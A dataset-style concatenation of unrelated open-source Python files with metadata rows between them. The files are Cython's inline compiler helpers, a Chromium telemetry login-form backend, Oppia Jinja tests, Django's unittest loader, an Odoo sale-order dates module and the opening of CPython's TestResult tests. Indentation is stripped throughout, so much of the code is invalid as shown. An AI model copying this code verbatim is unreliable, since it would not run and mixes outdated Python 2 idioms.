for phase in Pipeline.create_pipeline(context, 'pyx'):
if phase is None:
continue
tree = phase(tree)
if isinstance(phase, AnalyseDeclarationsTransform):
break
symbol_collector = AllSymbols()
symbol_collector(tree)
unbound = []
try:
import builtins
except ImportError:
import __builtin__ as builtins
for name in symbol_collector.names:
if not tree.scope.lookup(name) and not hasattr(builtins, name):
unbound.append(name)
return unbound
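# Illustrative example (sketch): unbound_symbols("c = a + b") would report
# ['a', 'b'] (order not guaranteed), since only 'c' is bound in the fragment.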
def unsafe_type(arg, context=None):
py_type = type(arg)
if py_type is int:
return 'long'
else:
return safe_type(arg, context)
def safe_type(arg, context=None):
py_type = type(arg)
if py_type in [list, tuple, dict, str]:
return py_type.__name__
elif py_type is complex:
return 'double complex'
elif py_type is float:
return 'double'
elif py_type is bool:
return 'bint'
elif 'numpy' in sys.modules and isinstance(arg, sys.modules['numpy'].ndarray):
return 'numpy.ndarray[numpy.%s_t, ndim=%s]' % (arg.dtype.name, arg.ndim)
else:
for base_type in py_type.mro():
if base_type.__module__ in ('__builtin__', 'builtins'):
return 'object'
module = context.find_module(base_type.__module__, need_pxd=False)
if module:
entry = module.lookup(base_type.__name__)
if entry.is_type:
return '%s.%s' % (base_type.__module__, base_type.__name__)
return 'object'
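# Illustrative examples (sketch): safe_type(1.5) -> 'double',
# safe_type(True) -> 'bint', and a 2-D float64 numpy array ->
# 'numpy.ndarray[numpy.float64_t, ndim=2]'.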
def _get_build_extension():
dist = Distribution()
# Ensure the build respects distutils configuration by parsing
# the configuration files
config_files = dist.find_config_files()
dist.parse_config_files(config_files)
build_extension = build_ext(dist)
build_extension.finalize_options()
return build_extension
@cached_function
def _create_context(cython_include_dirs):
return Context(list(cython_include_dirs), default_options)
def cython_inline(code,
get_type=unsafe_type,
lib_dir=os.path.join(get_cython_cache_dir(), 'inline'),
cython_include_dirs=['.'],
force=False,
quiet=False,
locals=None,
globals=None,
**kwds):
if get_type is None:
get_type = lambda x: 'object'
code = to_unicode(code)
orig_code = code
code, literals = strip_string_literals(code)
code = strip_common_indent(code)
ctx = _create_context(tuple(cython_include_dirs))
if locals is None:
locals = inspect.currentframe().f_back.f_back.f_locals
if globals is None:
globals = inspect.currentframe().f_back.f_back.f_globals
try:
for symbol in unbound_symbols(code):
if symbol in kwds:
continue
elif symbol in locals:
kwds[symbol] = locals[symbol]
elif symbol in globals:
kwds[symbol] = globals[symbol]
else:
print("Couldn't find ", symbol)
except AssertionError:
if not quiet:
# Parsing from strings not fully supported (e.g. cimports).
print("Could not parse code as a string (to extract unbound symbols).")
cimports = []
for name, arg in kwds.items():
if arg is cython_module:
cimports.append('\ncimport cython as %s' % name)
del kwds[name]
arg_names = kwds.keys()
arg_names.sort()
arg_sigs = tuple([(get_type(kwds[arg], ctx), arg) for arg in arg_names])
key = orig_code, arg_sigs, sys.version_info, sys.executable, Cython.__version__
module_name = "_cython_inline_" + hashlib.md5(str(key).encode('utf-8')).hexdigest()
if module_name in sys.modules:
module = sys.modules[module_name]
else:
build_extension = None
if cython_inline.so_ext is None:
# Figure out and cache current extension suffix
build_extension = _get_build_extension()
cython_inline.so_ext = build_extension.get_ext_filename('')
module_path = os.path.join(lib_dir, module_name + cython_inline.so_ext)
if not os.path.exists(lib_dir):
os.makedirs(lib_dir)
if force or not os.path.isfile(module_path):
cflags = []
c_include_dirs = []
qualified = re.compile(r'([.\w]+)[.]')
for type, _ in arg_sigs:
m = qualified.match(type)
if m:
cimports.append('\ncimport %s' % m.groups()[0])
# one special case
if m.groups()[0] == 'numpy':
import numpy
c_include_dirs.append(numpy.get_include())
# cflags.append('-Wno-unused')
module_body, func_body = extract_func_code(code)
params = ', '.join(['%s %s' % a for a in arg_sigs])
module_code = """
%(module_body)s
%(cimports)s
def __invoke(%(params)s):
%(func_body)s
""" % {'cimports': '\n'.join(cimports), 'module_body': module_body, 'params': params, 'func_body': func_body }
for key, value in literals.items():
module_code = module_code.replace(key, value)
pyx_file = os.path.join(lib_dir, module_name + '.pyx')
fh = open(pyx_file, 'w')
try:
fh.write(module_code)
finally:
fh.close()
extension = Extension(
name = module_name,
sources = [pyx_file],
include_dirs = c_include_dirs,
extra_compile_args = cflags)
if build_extension is None:
build_extension = _get_build_extension()
build_extension.extensions = cythonize([extension], include_path=cython_include_dirs, quiet=quiet)
build_extension.build_temp = os.path.dirname(pyx_file)
build_extension.build_lib = lib_dir
build_extension.run()
module = imp.load_dynamic(module_name, module_path)
arg_list = [kwds[arg] for arg in arg_names]
return module.__invoke(*arg_list)
# Cached suffix used by cython_inline above. None should get
# overridden with actual value upon the first cython_inline invocation
cython_inline.so_ext = None
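# Minimal usage sketch (assumes a working C compiler and Cython install):
#   cython_inline("return a + b", a=1, b=2)   # -> 3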
non_space = re.compile('[^ ]')
def strip_common_indent(code):
min_indent = None
lines = code.split('\n')
for line in lines:
match = non_space.search(line)
if not match:
continue # blank
indent = match.start()
if line[indent] == '#':
continue # comment
elif min_indent is None or min_indent > indent:
min_indent = indent
for ix, line in enumerate(lines):
match = non_space.search(line)
if not match or line[indent] == '#':
continue
else:
lines[ix] = line[min_indent:]
return '\n'.join(lines)
module_statement = re.compile(r'^((cdef +(extern|class))|cimport|(from .+ cimport)|(from .+ import +[*]))')
def extract_func_code(code):
module = []
function = []
current = function
code = code.replace('\t', ' ')
lines = code.split('\n')
for line in lines:
if not line.startswith(' '):
if module_statement.match(line):
current = module
else:
current = function
current.append(line)
return '\n'.join(module), ' ' + '\n '.join(function)
try:
from inspect import getcallargs
except ImportError:
def getcallargs(func, *arg_values, **kwd_values):
all = {}
args, varargs, kwds, defaults = inspect.getargspec(func)
if varargs is not None:
all[varargs] = arg_values[len(args):]
for name, value in zip(args, arg_values):
all[name] = value
for name, value in kwd_values.items():
if name in args:
if name in all:
raise TypeError("Duplicate argument %s" % name)
all[name] = kwd_values.pop(name)
if kwds is not None:
all[kwds] = kwd_values
elif kwd_values:
raise TypeError("Unexpected keyword arguments: %s" % kwd_values.keys())
if defaults is None:
defaults = ()
first_default = len(args) - len(defaults)
for ix, name in enumerate(args):
if name not in all:
if ix >= first_default:
all[name] = defaults[ix - first_default]
else:
raise TypeError("Missing argument: %s" % name)
return all
def get_body(source):
ix = source.index(':')
if source[:5] == 'lambda':
return "return %s" % source[ix+1:]
else:
return source[ix+1:]
# Lots to be done here... It would be especially cool if compiled functions
# could invoke each other quickly.
class RuntimeCompiledFunction(object):
def __init__(self, f):
self._f = f
self._body = get_body(inspect.getsource(f))
def __call__(self, *args, **kwds):
all = getcallargs(self._f, *args, **kwds)
return cython_inline(self._body, locals=self._f.func_globals, globals=self._f.func_globals, **all)
| bsd-3-clause | 3,451,448,706,579,078,000 | -2,717,700,032,969,823,000 | 34.782895 | 122 | 0.585034 | false |
yury-s/v8-inspector | Source/chrome/tools/telemetry/telemetry/core/backends/form_based_credentials_backend.py | 24 | 3604 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
from telemetry.core import exceptions
class FormBasedCredentialsBackend(object):
def __init__(self):
self._logged_in = False
def IsAlreadyLoggedIn(self, tab):
return tab.EvaluateJavaScript(self.logged_in_javascript)
@property
def credentials_type(self):
raise NotImplementedError()
@property
def url(self):
raise NotImplementedError()
@property
def login_form_id(self):
raise NotImplementedError()
@property
def login_button_javascript(self):
"""Some sites have custom JS to log in."""
return None
@property
def login_input_id(self):
raise NotImplementedError()
@property
def password_input_id(self):
raise NotImplementedError()
@property
def logged_in_javascript(self):
"""Evaluates to true iff already logged in."""
raise NotImplementedError()
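  # A minimal subclass sketch (all names below are illustrative assumptions,
  # not a backend shipped with telemetry):
  #   class ExampleBackend(FormBasedCredentialsBackend):
  #     credentials_type = 'example'
  #     url = 'https://example.com/login'
  #     login_form_id = 'login-form'
  #     login_input_id = 'email'
  #     password_input_id = 'password'
  #     logged_in_javascript = 'document.cookie.indexOf("session") !== -1'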
def IsLoggedIn(self):
return self._logged_in
def _ResetLoggedInState(self):
"""Makes the backend think we're not logged in even though we are.
Should only be used in unit tests to simulate --dont-override-profile.
"""
self._logged_in = False
def _WaitForLoginState(self, action_runner):
"""Waits until it can detect either the login form, or already logged in."""
condition = '(document.querySelector("#%s") !== null) || (%s)' % (
self.login_form_id, self.logged_in_javascript)
action_runner.WaitForJavaScriptCondition(condition, 60)
def _SubmitLoginFormAndWait(self, action_runner, tab, username, password):
"""Submits the login form and waits for the navigation."""
tab.WaitForDocumentReadyStateToBeInteractiveOrBetter()
    email_js = 'document.querySelector("#%s #%s").value = "%s"; ' % (
        self.login_form_id, self.login_input_id, username)
    password_js = 'document.querySelector("#%s #%s").value = "%s"; ' % (
        self.login_form_id, self.password_input_id, password)
    tab.ExecuteJavaScript(email_js)
    tab.ExecuteJavaScript(password_js)
if self.login_button_javascript:
tab.ExecuteJavaScript(self.login_button_javascript)
else:
tab.ExecuteJavaScript(
'document.getElementById("%s").submit();' % self.login_form_id)
# Wait for the form element to disappear as confirmation of the navigation.
action_runner.WaitForNavigate()
def LoginNeeded(self, tab, action_runner, config):
"""Logs in to a test account.
Raises:
RuntimeError: if could not get credential information.
"""
if self._logged_in:
return True
if 'username' not in config or 'password' not in config:
message = ('Credentials for "%s" must include username and password.' %
self.credentials_type)
raise RuntimeError(message)
logging.debug('Logging into %s account...' % self.credentials_type)
if 'url' in config:
url = config['url']
else:
url = self.url
try:
logging.info('Loading %s...', url)
tab.Navigate(url)
self._WaitForLoginState(action_runner)
if self.IsAlreadyLoggedIn(tab):
self._logged_in = True
return True
self._SubmitLoginFormAndWait(
action_runner, tab, config['username'], config['password'])
self._logged_in = True
return True
except exceptions.TimeoutException:
logging.warning('Timed out while loading: %s', url)
return False
def LoginNoLongerNeeded(self, tab): # pylint: disable=W0613
assert self._logged_in
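# Editor's note: hedged illustration, not part of the original Chromium file.
# A concrete backend only has to supply site-specific values for the abstract
# properties above; every identifier below ('example', 'login-form', ...) is an
# invented placeholder.
class ExampleCredentialsBackend(FormBasedCredentialsBackend):
  @property
  def credentials_type(self):
    return 'example'
  @property
  def url(self):
    return 'https://example.com/login'
  @property
  def login_form_id(self):
    return 'login-form'
  @property
  def login_input_id(self):
    return 'username'
  @property
  def password_input_id(self):
    return 'password'
  @property
  def logged_in_javascript(self):
    # Evaluates to true in the page only when a logout link is present.
    return 'document.querySelector("#logout-link") !== null'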
| bsd-3-clause | 2,131,944,338,850,221,800 | 4,402,087,261,043,419,600 | 29.285714 | 80 | 0.67758 | false |
amitdeutsch/oppia | jinja_utils_test.py | 9 | 4194 | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=relative-import
from core.tests import test_utils
import jinja_utils
class JinjaUtilsUnitTests(test_utils.GenericTestBase):
def test_js_string_filter(self):
"""Test js_string filter."""
expected_values = [
('a', '\\"a\\"'),
(2, '2'),
(5.5, '5.5'),
("'", '\\"\\\'\\"'),
(u'¡Hola!', '\\"\\\\u00a1Hola!\\"'),
(['a', '¡Hola!', 2], '[\\"a\\", \\"\\\\u00a1Hola!\\", 2]'),
({'a': 4, '¡Hola!': 2}, '{\\"a\\": 4, \\"\\\\u00a1Hola!\\": 2}'),
('', '\\"\\"'),
(None, 'null'),
(['a', {'b': 'c', 'd': ['e', None]}],
'[\\"a\\", {\\"b\\": \\"c\\", \\"d\\": [\\"e\\", null]}]')
]
for tup in expected_values:
self.assertEqual(jinja_utils.JINJA_FILTERS['js_string'](
tup[0]), tup[1])
def test_parse_string(self):
parsed_str = jinja_utils.parse_string('{{test}}', {'test': 'hi'})
self.assertEqual(parsed_str, 'hi')
# Some parameters are missing.
parsed_str = jinja_utils.parse_string(
'{{test}} and {{test2}}', {'test2': 'hi'})
self.assertEqual(parsed_str, ' and hi')
# All parameters are missing.
parsed_str = jinja_utils.parse_string('{{test}} and {{test2}}', {})
self.assertEqual(parsed_str, ' and ')
# The string has no parameters.
parsed_str = jinja_utils.parse_string('no params', {'param': 'hi'})
self.assertEqual(parsed_str, 'no params')
# Integer parameters are used.
parsed_str = jinja_utils.parse_string('int {{i}}', {'i': 2})
self.assertEqual(parsed_str, 'int 2')
def test_evaluate_object(self):
parsed_object = jinja_utils.evaluate_object('abc', {})
self.assertEqual(parsed_object, 'abc')
parsed_object = jinja_utils.evaluate_object('{{ab}}', {'ab': 'c'})
self.assertEqual(parsed_object, 'c')
parsed_object = jinja_utils.evaluate_object('abc{{ab}}', {'ab': 'c'})
self.assertEqual(parsed_object, 'abcc')
parsed_object = jinja_utils.evaluate_object(
['a', '{{a}}', 'a{{a}}'], {'a': 'b'})
self.assertEqual(parsed_object, ['a', 'b', 'ab'])
parsed_object = jinja_utils.evaluate_object({}, {})
self.assertEqual(parsed_object, {})
parsed_object = jinja_utils.evaluate_object({}, {'a': 'b'})
self.assertEqual(parsed_object, {})
parsed_object = jinja_utils.evaluate_object({'a': 'b'}, {})
self.assertEqual(parsed_object, {'a': 'b'})
parsed_object = jinja_utils.evaluate_object(
{'a': 'a{{b}}'}, {'b': 'c'})
self.assertEqual(parsed_object, {'a': 'ac'})
parsed_object = jinja_utils.evaluate_object({'a': '{{b}}'}, {'b': 3})
self.assertEqual(parsed_object, {'a': '3'})
parsed_object = jinja_utils.evaluate_object({'a': '{{b}}'}, {'b': 'c'})
self.assertEqual(parsed_object, {'a': 'c'})
# Failure cases should be handled gracefully.
parsed_object = jinja_utils.evaluate_object('{{c}}', {})
self.assertEqual(parsed_object, '')
parsed_object = jinja_utils.evaluate_object('{{c}}', {'a': 'b'})
self.assertEqual(parsed_object, '')
# Test that the original dictionary is unchanged.
orig_dict = {'a': '{{b}}'}
parsed_dict = jinja_utils.evaluate_object(orig_dict, {'b': 'c'})
self.assertEqual(orig_dict, {'a': '{{b}}'})
self.assertEqual(parsed_dict, {'a': 'c'})
| apache-2.0 | 2,457,329,882,570,763,000 | 1,260,798,460,556,075,800 | 37.1 | 79 | 0.549988 | false |
cosmiclattes/TPBviz | torrent/lib/python2.7/site-packages/django/utils/unittest/loader.py | 110 | 13445 | """Loading unittests."""
import os
import re
import sys
import traceback
import types
import unittest
from fnmatch import fnmatch
from django.utils.unittest import case, suite
try:
from os.path import relpath
except ImportError:
from django.utils.unittest.compatibility import relpath
__unittest = True
def _CmpToKey(mycmp):
'Convert a cmp= function into a key= function'
class K(object):
def __init__(self, obj):
self.obj = obj
def __lt__(self, other):
return mycmp(self.obj, other.obj) == -1
return K
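# Editor's note: hedged example, not part of the original module. _CmpToKey
# adapts a cmp-style comparator for key-based sorting, as getTestCaseNames()
# below does; `names` here is any list of method names.
def _example_sort_with_cmp(names, mycmp=cmp):
    names.sort(key=_CmpToKey(mycmp))
    return names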
# what about .pyc or .pyo (etc)
# we would need to avoid loading the same tests multiple times
# from '.py', '.pyc' *and* '.pyo'
VALID_MODULE_NAME = re.compile(r'[_a-z]\w*\.py$', re.IGNORECASE)
def _make_failed_import_test(name, suiteClass):
message = 'Failed to import test module: %s' % name
if hasattr(traceback, 'format_exc'):
# Python 2.3 compatibility
# format_exc returns two frames of discover.py as well
message += '\n%s' % traceback.format_exc()
return _make_failed_test('ModuleImportFailure', name, ImportError(message),
suiteClass)
def _make_failed_load_tests(name, exception, suiteClass):
return _make_failed_test('LoadTestsFailure', name, exception, suiteClass)
def _make_failed_test(classname, methodname, exception, suiteClass):
def testFailure(self):
raise exception
attrs = {methodname: testFailure}
TestClass = type(classname, (case.TestCase,), attrs)
return suiteClass((TestClass(methodname),))
class TestLoader(unittest.TestLoader):
"""
This class is responsible for loading tests according to various criteria
and returning them wrapped in a TestSuite
"""
testMethodPrefix = 'test'
sortTestMethodsUsing = cmp
suiteClass = suite.TestSuite
_top_level_dir = None
def loadTestsFromTestCase(self, testCaseClass):
"""Return a suite of all tests cases contained in testCaseClass"""
if issubclass(testCaseClass, suite.TestSuite):
raise TypeError("Test cases should not be derived from TestSuite."
" Maybe you meant to derive from TestCase?")
testCaseNames = self.getTestCaseNames(testCaseClass)
if not testCaseNames and hasattr(testCaseClass, 'runTest'):
testCaseNames = ['runTest']
loaded_suite = self.suiteClass(map(testCaseClass, testCaseNames))
return loaded_suite
def loadTestsFromModule(self, module, use_load_tests=True):
"""Return a suite of all tests cases contained in the given module"""
tests = []
for name in dir(module):
obj = getattr(module, name)
if isinstance(obj, type) and issubclass(obj, unittest.TestCase):
tests.append(self.loadTestsFromTestCase(obj))
load_tests = getattr(module, 'load_tests', None)
tests = self.suiteClass(tests)
if use_load_tests and load_tests is not None:
try:
return load_tests(self, tests, None)
except Exception as e:
return _make_failed_load_tests(module.__name__, e,
self.suiteClass)
return tests
def loadTestsFromName(self, name, module=None):
"""Return a suite of all tests cases given a string specifier.
The name may resolve either to a module, a test case class, a
test method within a test case class, or a callable object which
returns a TestCase or TestSuite instance.
The method optionally resolves the names relative to a given module.
"""
parts = name.split('.')
if module is None:
parts_copy = parts[:]
while parts_copy:
try:
module = __import__('.'.join(parts_copy))
break
except ImportError:
del parts_copy[-1]
if not parts_copy:
raise
parts = parts[1:]
obj = module
for part in parts:
parent, obj = obj, getattr(obj, part)
if isinstance(obj, types.ModuleType):
return self.loadTestsFromModule(obj)
elif isinstance(obj, type) and issubclass(obj, unittest.TestCase):
return self.loadTestsFromTestCase(obj)
elif (isinstance(obj, types.UnboundMethodType) and
isinstance(parent, type) and
issubclass(parent, unittest.TestCase)):
return self.suiteClass([parent(obj.__name__)])
elif isinstance(obj, unittest.TestSuite):
return obj
elif hasattr(obj, '__call__'):
test = obj()
if isinstance(test, unittest.TestSuite):
return test
elif isinstance(test, unittest.TestCase):
return self.suiteClass([test])
else:
raise TypeError("calling %s returned %s, not a test" %
(obj, test))
else:
raise TypeError("don't know how to make test from: %s" % obj)
def loadTestsFromNames(self, names, module=None):
"""Return a suite of all tests cases found using the given sequence
of string specifiers. See 'loadTestsFromName()'.
"""
suites = [self.loadTestsFromName(name, module) for name in names]
return self.suiteClass(suites)
def getTestCaseNames(self, testCaseClass):
"""Return a sorted sequence of method names found within testCaseClass
"""
def isTestMethod(attrname, testCaseClass=testCaseClass,
prefix=self.testMethodPrefix):
return attrname.startswith(prefix) and \
hasattr(getattr(testCaseClass, attrname), '__call__')
testFnNames = filter(isTestMethod, dir(testCaseClass))
if self.sortTestMethodsUsing:
testFnNames.sort(key=_CmpToKey(self.sortTestMethodsUsing))
return testFnNames
def discover(self, start_dir, pattern='test*.py', top_level_dir=None):
"""Find and return all test modules from the specified start
directory, recursing into subdirectories to find them. Only test files
that match the pattern will be loaded. (Using shell style pattern
matching.)
All test modules must be importable from the top level of the project.
If the start directory is not the top level directory then the top
level directory must be specified separately.
If a test package name (directory with '__init__.py') matches the
pattern then the package will be checked for a 'load_tests' function. If
this exists then it will be called with loader, tests, pattern.
If load_tests exists then discovery does *not* recurse into the package,
load_tests is responsible for loading all tests in the package.
The pattern is deliberately not stored as a loader attribute so that
packages can continue discovery themselves. top_level_dir is stored so
load_tests does not need to pass this argument in to loader.discover().
"""
set_implicit_top = False
if top_level_dir is None and self._top_level_dir is not None:
# make top_level_dir optional if called from load_tests in a package
top_level_dir = self._top_level_dir
elif top_level_dir is None:
set_implicit_top = True
top_level_dir = start_dir
top_level_dir = os.path.abspath(top_level_dir)
if not top_level_dir in sys.path:
# all test modules must be importable from the top level directory
# should we *unconditionally* put the start directory in first
# in sys.path to minimise likelihood of conflicts between installed
# modules and development versions?
sys.path.insert(0, top_level_dir)
self._top_level_dir = top_level_dir
is_not_importable = False
if os.path.isdir(os.path.abspath(start_dir)):
start_dir = os.path.abspath(start_dir)
if start_dir != top_level_dir:
is_not_importable = not os.path.isfile(os.path.join(start_dir, '__init__.py'))
else:
# support for discovery from dotted module names
try:
__import__(start_dir)
except ImportError:
is_not_importable = True
else:
the_module = sys.modules[start_dir]
top_part = start_dir.split('.')[0]
start_dir = os.path.abspath(os.path.dirname((the_module.__file__)))
if set_implicit_top:
self._top_level_dir = os.path.abspath(os.path.dirname(os.path.dirname(sys.modules[top_part].__file__)))
sys.path.remove(top_level_dir)
if is_not_importable:
raise ImportError('Start directory is not importable: %r' % start_dir)
tests = list(self._find_tests(start_dir, pattern))
return self.suiteClass(tests)
def _get_name_from_path(self, path):
path = os.path.splitext(os.path.normpath(path))[0]
_relpath = relpath(path, self._top_level_dir)
assert not os.path.isabs(_relpath), "Path must be within the project"
assert not _relpath.startswith('..'), "Path must be within the project"
name = _relpath.replace(os.path.sep, '.')
return name
def _get_module_from_name(self, name):
__import__(name)
return sys.modules[name]
def _match_path(self, path, full_path, pattern):
# override this method to use alternative matching strategy
return fnmatch(path, pattern)
def _find_tests(self, start_dir, pattern):
"""Used by discovery. Yields test suites it loads."""
paths = os.listdir(start_dir)
for path in paths:
full_path = os.path.join(start_dir, path)
if os.path.isfile(full_path):
if not VALID_MODULE_NAME.match(path):
# valid Python identifiers only
continue
if not self._match_path(path, full_path, pattern):
continue
# if the test file matches, load it
name = self._get_name_from_path(full_path)
try:
module = self._get_module_from_name(name)
except:
yield _make_failed_import_test(name, self.suiteClass)
else:
mod_file = os.path.abspath(getattr(module, '__file__', full_path))
realpath = os.path.splitext(mod_file)[0]
fullpath_noext = os.path.splitext(full_path)[0]
if realpath.lower() != fullpath_noext.lower():
module_dir = os.path.dirname(realpath)
mod_name = os.path.splitext(os.path.basename(full_path))[0]
expected_dir = os.path.dirname(full_path)
msg = ("%r module incorrectly imported from %r. Expected %r. "
"Is this module globally installed?")
raise ImportError(msg % (mod_name, module_dir, expected_dir))
yield self.loadTestsFromModule(module)
elif os.path.isdir(full_path):
if not os.path.isfile(os.path.join(full_path, '__init__.py')):
continue
load_tests = None
tests = None
if fnmatch(path, pattern):
# only check load_tests if the package directory itself matches the filter
name = self._get_name_from_path(full_path)
package = self._get_module_from_name(name)
load_tests = getattr(package, 'load_tests', None)
tests = self.loadTestsFromModule(package, use_load_tests=False)
if load_tests is None:
if tests is not None:
# tests loaded from package file
yield tests
# recurse into the package
for test in self._find_tests(full_path, pattern):
yield test
else:
try:
yield load_tests(self, tests, pattern)
except Exception as e:
yield _make_failed_load_tests(package.__name__, e,
self.suiteClass)
defaultTestLoader = TestLoader()
def _makeLoader(prefix, sortUsing, suiteClass=None):
loader = TestLoader()
loader.sortTestMethodsUsing = sortUsing
loader.testMethodPrefix = prefix
if suiteClass:
loader.suiteClass = suiteClass
return loader
def getTestCaseNames(testCaseClass, prefix, sortUsing=cmp):
return _makeLoader(prefix, sortUsing).getTestCaseNames(testCaseClass)
def makeSuite(testCaseClass, prefix='test', sortUsing=cmp,
suiteClass=suite.TestSuite):
return _makeLoader(prefix, sortUsing, suiteClass).loadTestsFromTestCase(testCaseClass)
def findTestCases(module, prefix='test', sortUsing=cmp,
suiteClass=suite.TestSuite):
return _makeLoader(prefix, sortUsing, suiteClass).loadTestsFromModule(module)
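# Editor's note: hedged usage example, not part of the original module; the
# 'tests' directory and pattern below are illustrative.
def _example_discover_and_load():
    # Collect every test*.py module under 'tests/' (importable from the
    # project root) into one suite using the module-level defaultTestLoader.
    return defaultTestLoader.discover('tests', pattern='test*.py',
                                      top_level_dir='.')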
| gpl-3.0 | 8,355,986,575,746,063,000 | -1,977,566,966,300,549,000 | 40.754658 | 123 | 0.59524 | false |
srsman/odoo | addons/sale_order_dates/sale_order_dates.py | 223 | 5308 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta
from openerp.osv import fields, osv
from openerp.tools.translate import _
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT
class sale_order_dates(osv.osv):
"""Add several date fields to Sale Orders, computed or user-entered"""
_inherit = 'sale.order'
def _get_date_planned(self, cr, uid, order, line, start_date, context=None):
"""Compute the expected date from the requested date, not the order date"""
if order and order.requested_date:
date_planned = datetime.strptime(order.requested_date, DEFAULT_SERVER_DATETIME_FORMAT)
date_planned -= timedelta(days=order.company_id.security_lead)
return date_planned.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
return super(sale_order_dates, self)._get_date_planned(
cr, uid, order, line, start_date, context=context)
def _get_effective_date(self, cr, uid, ids, name, arg, context=None):
"""Read the shipping date from the related packings"""
# TODO: would be better if it returned the date the picking was processed?
res = {}
dates_list = []
for order in self.browse(cr, uid, ids, context=context):
dates_list = []
for pick in order.picking_ids:
dates_list.append(pick.date)
if dates_list:
res[order.id] = min(dates_list)
else:
res[order.id] = False
return res
def _get_commitment_date(self, cr, uid, ids, name, arg, context=None):
"""Compute the commitment date"""
res = {}
dates_list = []
for order in self.browse(cr, uid, ids, context=context):
dates_list = []
order_datetime = datetime.strptime(order.date_order, DEFAULT_SERVER_DATETIME_FORMAT)
for line in order.order_line:
if line.state == 'cancel':
continue
dt = order_datetime + timedelta(days=line.delay or 0.0)
dt_s = dt.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
dates_list.append(dt_s)
if dates_list:
res[order.id] = min(dates_list)
return res
def onchange_requested_date(self, cr, uid, ids, requested_date,
commitment_date, context=None):
"""Warn if the requested dates is sooner than the commitment date"""
if (requested_date and commitment_date and requested_date < commitment_date):
return {'warning': {
'title': _('Requested date is too soon!'),
'message': _("The date requested by the customer is "
"sooner than the commitment date. You may be "
"unable to honor the customer's request.")
}
}
return {}
_columns = {
'commitment_date': fields.function(_get_commitment_date, store=True,
type='datetime', string='Commitment Date',
help="Date by which the products are sure to be delivered. This is "
"a date that you can promise to the customer, based on the "
"Product Lead Times."),
'requested_date': fields.datetime('Requested Date',
readonly=True, states={'draft': [('readonly', False)],
'sent': [('readonly', False)]}, copy=False,
help="Date by which the customer has requested the items to be "
"delivered.\n"
"When this Order gets confirmed, the Delivery Order's "
"expected date will be computed based on this date and the "
"Company's Security Delay.\n"
"Leave this field empty if you want the Delivery Order to be "
"processed as soon as possible. In that case the expected "
"date will be computed using the default method: based on "
"the Product Lead Times and the Company's Security Delay."),
'effective_date': fields.function(_get_effective_date, type='date',
store=True, string='Effective Date',
help="Date on which the first Delivery Order was created."),
}
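# Editor's note: hedged illustration, not part of the original module. It
# restates the rule implemented by _get_date_planned(): deliveries are planned
# 'security_lead' days before the customer's requested date. The two-day lead
# used below is an assumed example value.
def _example_date_planned(requested_date_str, security_lead_days=2):
    planned = datetime.strptime(requested_date_str, DEFAULT_SERVER_DATETIME_FORMAT)
    planned -= timedelta(days=security_lead_days)
    return planned.strftime(DEFAULT_SERVER_DATETIME_FORMAT)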
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 4,793,952,718,000,898,000 | 3,340,271,542,870,646,300 | 47.254545 | 98 | 0.587038 | false |
yousafsyed/casperjs | bin/Lib/unittest/test/test_result.py | 81 | 23247 | import io
import sys
import textwrap
from test import support
import traceback
import unittest
class Test_TestResult(unittest.TestCase):
# Note: there are not separate tests for TestResult.wasSuccessful(),
# TestResult.errors, TestResult.failures, TestResult.testsRun or
# TestResult.shouldStop because these only have meaning in terms of
# other TestResult methods.
#
# Accordingly, tests for the aforenamed attributes are incorporated
# in with the tests for the defining methods.
################################################################
def test_init(self):
result = unittest.TestResult()
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 0)
self.assertEqual(result.shouldStop, False)
self.assertIsNone(result._stdout_buffer)
self.assertIsNone(result._stderr_buffer)
# "This method can be called to signal that the set of tests being
# run should be aborted by setting the TestResult's shouldStop
# attribute to True."
def test_stop(self):
result = unittest.TestResult()
result.stop()
self.assertEqual(result.shouldStop, True)
# "Called when the test case test is about to be run. The default
# implementation simply increments the instance's testsRun counter."
def test_startTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# "Called after the test case test has been executed, regardless of
# the outcome. The default implementation does nothing."
def test_stopTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# Same tests as above; make sure nothing has changed
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "Called before and after tests are run. The default implementation does nothing."
def test_startTestRun_stopTestRun(self):
result = unittest.TestResult()
result.startTestRun()
result.stopTestRun()
# "addSuccess(test)"
# ...
# "Called when the test case test succeeds"
